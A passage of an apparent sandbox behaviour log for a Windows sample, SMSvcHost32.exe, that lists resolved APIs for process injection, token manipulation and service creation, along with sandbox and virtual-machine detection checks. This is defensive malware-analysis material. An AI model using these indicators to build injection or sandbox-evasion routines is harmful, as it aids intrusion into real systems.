| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpSendRequest, address_out = 0x7023bfd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpConnect, address_out = 0x70242880 |
|
1 | |
| Module | Get Handle | module_name = NETAPI32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = NETAPI32.dll, base_address = 0x77490000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetUserGetInfo, address_out = 0x6ff733a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x765e2790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x765e2730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x765b2510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x765baba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x765c66f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x765bd290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x765bf5a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeThread, address_out = 0x765c4f40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x765e2850 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x765bafe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x765c6770 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x765b2ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x765baa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageA, address_out = 0x765bf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x765b7830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x765c6a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileExW, address_out = 0x765bb2b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x765c6ec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x765b7970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x765b3690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemInfo, address_out = 0x765ba0f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x765c0160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x765c6a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x765c4940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x765c6a70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x765c68c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x765c68e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x765c6c00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x765c6c40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x765c6c60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x765b7a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x765b38c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x765bcd50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x765c5100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteAtom, address_out = 0x765bcb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x765b8c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x765c6820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x779c7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x765b99f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAddAtomW, address_out = 0x765b1be0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x765b8bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x765b7990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x765b3870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x765c4bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x765c6630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x765b9b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x765b78b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomW, address_out = 0x765b20f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x765b7710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x765bb000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x765b9f50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x765bfdb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x765b9fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringA, address_out = 0x765bfde0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x765bea30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x765c7b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessPriorityBoost, address_out = 0x765bfef0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x765b9e90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x765b9b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadPriority, address_out = 0x765b9990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x765b75f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x765dd170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x765b9950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x765bccf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x765b79a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x765dd260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x765bcc30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x765c6bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x765c6b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x765c6890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempFileNameW, address_out = 0x765c6b10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x765b7a30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x7798efe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x765b7600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x765b7810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x765c6bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x765c6ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x765c6640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x765e0990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x765c69b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x765baaf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x765c66b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x765c46a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x765b3880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x765bfbf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameW, address_out = 0x765b2b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x765c6960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x765c69a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7783f890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x778404a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ExitWindowsEx, address_out = 0x77879430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetShellWindow, address_out = 0x7782ff50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7782d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74aa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x74ac2910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupAccountSidW, address_out = 0x74abf590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x74ac0ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x74abf570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessAsUserW, address_out = 0x74ac2c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74ac0440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x74abf520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExA, address_out = 0x74ac0a20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetTokenInformation, address_out = 0x74ac3840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyA, address_out = 0x74ac09d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74abf620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertSidToStringSidW, address_out = 0x74abf060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x74ad4dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74abf330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74abf350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeAcl, address_out = 0x74abfa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AddAce, address_out = 0x74ac1ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74abf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetKeySecurity, address_out = 0x74ad7830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x74ac2550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74ac2570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegGetKeySecurity, address_out = 0x74ac4190 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorDacl, address_out = 0x74abfc50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74abf790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74abfb50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateWellKnownSid, address_out = 0x74ac0af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x74ac0ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x74ac0eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x74abf500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x74ac3ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x74ac2bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetFileSecurityW, address_out = 0x74ac41d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyW, address_out = 0x74abfaa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74ac1030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceW, address_out = 0x74ac4210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x74ac0ed0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x74ac0960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateServiceW, address_out = 0x74ad65d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetServiceStatus, address_out = 0x74ac0fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegisterServiceCtrlHandlerW, address_out = 0x74ac12f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceCtrlDispatcherW, address_out = 0x74ac12b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyA, address_out = 0x74ac2500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x74abf370 |
|
1 | |
| Module | Get Handle | module_name = Secur32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x6ff60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7469c5f0 |
|
1 | |
| Module | Get Handle | module_name = SHELL32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x752be690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = 680, address_out = 0x753cdb90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHChangeNotify, address_out = 0x7527cd10 |
|
1 | |
| Module | Get Handle | module_name = ole32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x771d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoTaskMemFree, address_out = 0x748d9170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x74900060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x77201930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x748d92a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x748d88d0 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
1 |
Thread 0xd54
12
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x765b8d20 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x752cbf80 |
|
1 | |
| Module | Get Filename | module_name = ole32.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Mutex | Open | mutex_name = ServiceEntryPointThread, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Mutex | Create | mutex_name = ServiceEntryPointThread |
|
1 |
Thread 0xa40
120
3
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = MP3 file corrupted |
|
1 | ||
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Hardware\DESCRIPTION\System\CentralProcessor\0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Hardware\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 |
|
1 | |
| Module | Load | module_name = RPCRT4.dll, base_address = 0x75070000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreateSequential, address_out = 0x7507db30 |
|
1 | |
| Module | Get Handle | module_name = dbghelp.dll, base_address = 0x0 |
|
1 | |
| Module | Get Handle | module_name = sbiedll.dll, base_address = 0x0 |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, value_name = SystemBiosVersion, data = 4411304, type = REG_MULTI_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System, value_name = VideoBiosVersion, data = 71, type = REG_NONE |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion, value_name = SystemBiosVersion, data = 71, type = REG_NONE |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x779d7000 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x765b9f10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
